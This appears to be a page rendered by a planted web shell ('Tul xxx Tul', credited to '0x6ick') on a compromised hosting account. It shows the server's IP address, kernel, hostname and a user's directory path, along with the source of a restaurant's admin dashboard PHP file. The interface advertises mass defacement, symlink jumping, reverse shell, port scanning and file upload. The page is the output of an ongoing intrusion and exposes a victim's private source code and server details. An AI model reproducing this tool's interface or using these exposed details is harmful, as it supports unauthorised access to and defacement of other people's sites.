Tul xxx Tul
User / IP
:
216.73.216.95
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
emprendo.com.co
/
invitados
/
condorburguer
/
admin
/
Viewing: dashboard.php
<?php include '../components/connect.php'; session_start(); $admin_id = $_SESSION['admin_id']; if(!isset($admin_id)){ header('location:admin_login.php'); } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Administración</title> <link rel="icon" href="../images/favi.ico" type="image/x-icon"> <!-- font awesome cdn link --> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css"> <!-- custom css file link --> <link rel="stylesheet" href="../css/admin_style.css"> <style> :root { --main-color: #ff9800; --money-green: #27ae60; --black: #222; --white: #fff; --gray: #f5f5f5; --shadow: 0 4px 24px rgba(0,0,0,0.10); --radius: 18px; --filter-bg: linear-gradient(90deg, #e0ffe7 0%, #b2f7c5 100%); } body { background: linear-gradient(135deg, #fffbe6 0%, #ffe0b2 100%); min-height: 100vh; } </style> </head> <body style="background-image: url('../images/background1.png'); background-size: cover; background-position: center; background-repeat: no-repeat;"> <?php include '../components/admin_header.php' ?> <!-- admin dashboard section starts --> <section class="dashboard"> <h1 class="heading">Administrar</h1> <div class="box-container"> <div class="box"> <h3>Bienvenido!</h3> <p><?= $fetch_profile['name']; ?></p> <a href="update_profile.php" class="btn">Actualizar Perfíl</a> </div> <!-- PARA VER LAS ORDENES DE LA PÁGINA --> <!-- <div class="box"> <?php $total_pendings = 0; $select_pendings = $conn->prepare("SELECT * FROM `orders` WHERE payment_status = ?"); $select_pendings->execute(['pending']); while($fetch_pendings = $select_pendings->fetch(PDO::FETCH_ASSOC)){ $total_pendings += $fetch_pendings['total_price']; } ?> <h3><span>$</span><?= $total_pendings; ?><span>/-</span></h3> <p>total pendings</p> <a href="placed_orders.php" class="btn">see orders</a> </div> --> <!-- <div class="box"> <?php $total_completes = 0; $select_completes = $conn->prepare("SELECT * FROM `orders` WHERE payment_status = ?"); $select_completes->execute(['completed']); while($fetch_completes = $select_completes->fetch(PDO::FETCH_ASSOC)){ $total_completes += $fetch_completes['total_price']; } ?> <h3><span>$</span><?= $total_completes; ?><span>/-</span></h3> <p>total completes</p> <a href="placed_orders.php" class="btn">see orders</a> </div> --> <!-- <div class="box"> <?php $select_orders = $conn->prepare("SELECT * FROM `orders`"); $select_orders->execute(); $numbers_of_orders = $select_orders->rowCount(); ?> <h3><?= $numbers_of_orders; ?></h3> <p>total orders</p> <a href="placed_orders.php" class="btn">see orders</a> </div> --> <div class="box"> <?php $select_messages = $conn->prepare("SELECT * FROM `messages`"); $select_messages->execute(); $numbers_of_messages = $select_messages->rowCount(); ?> <h3><?= $numbers_of_messages; ?></h3> <p>Pedidos de Mesas</p> <a href="messages.php" class="btn">Ver Pedidos</a> </div> <div class="box"> <?php $select_products = $conn->prepare("SELECT * FROM `products`"); $select_products->execute(); $numbers_of_products = $select_products->rowCount(); ?> <h3><?= $numbers_of_products; ?></h3> <p>Comidas añadidas</p> <a href="products.php" class="btn">Ver comidas</a> </div> <!-- <div class="box"> <?php $select_users = $conn->prepare("SELECT * FROM `users`"); $select_users->execute(); $numbers_of_users = $select_users->rowCount(); ?> <h3><?= $numbers_of_users; ?></h3> <p>users accounts</p> <a href="users_accounts.php" class="btn">see users</a> </div> --> <div class="box"> <?php $select_admins = $conn->prepare("SELECT * FROM `admin`"); $select_admins->execute(); $numbers_of_admins = $select_admins->rowCount(); ?> <h3><?= $numbers_of_admins; ?></h3> <p>Usuarios</p> <a href="admin_accounts.php" class="btn">Ver usuarios</a> </div> </div> </section> <!-- admin dashboard section ends --> <!-- custom js file link --> <script src="../js/admin_script.js"></script> </body> </html>
Coded With 💗 by
0x6ick